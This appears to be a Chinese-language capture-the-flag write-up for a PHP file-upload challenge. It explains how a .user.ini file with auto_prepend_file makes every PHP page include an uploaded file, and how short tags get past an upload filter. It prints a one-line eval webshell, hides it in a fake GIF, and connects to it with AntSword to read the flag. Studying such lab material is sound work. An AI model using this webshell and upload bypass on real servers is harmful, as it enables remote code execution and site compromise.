知识点讲解
本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行
关于.user.ini文件是怎么利用的,可以点此查看非常详细,我这里截取一段
.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR、PHP_INI_USER”的设置。
而且,和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载
使用方法:
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:
auto_prepend_file=01.gif
01.gif是要包含的文件。
所以,我们可以借助.user.ini轻松让所有php文件都自动包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。
上传的时候会检测文件内有没有php标签,导致上传不了,我们可以使用短标签进行绕过,以下是介绍
从PHP5.4.0开始,无论php.ini中如何设置,都可以使用短标签。
以下为例子:
一句话木马:<?= eval($_POST[cmd]);?>
了解了以上的知识之后,我们就可以开始做题了
开始做题
创建环境后打开页面,是一个上传界面
正常上传php文件,是不可行的
我们尝试上传一个.user.ini上去,让他使所有php文件都自动包含我们的一句话木马
记得要把文件类型改成图片格式的
文件上传成功,我们再上传一个a.gif,里面用短标签写上一句话木马
上传成功,我们使用蚁剑连接一下,这里注意,连接的时候是index.php
连接上去之后,我们查看/flag文件就可以得到flag了
此题结束
结尾
学到了新的知识,比如php短标签绕过,比如专用于fastcgi的.user.ini文件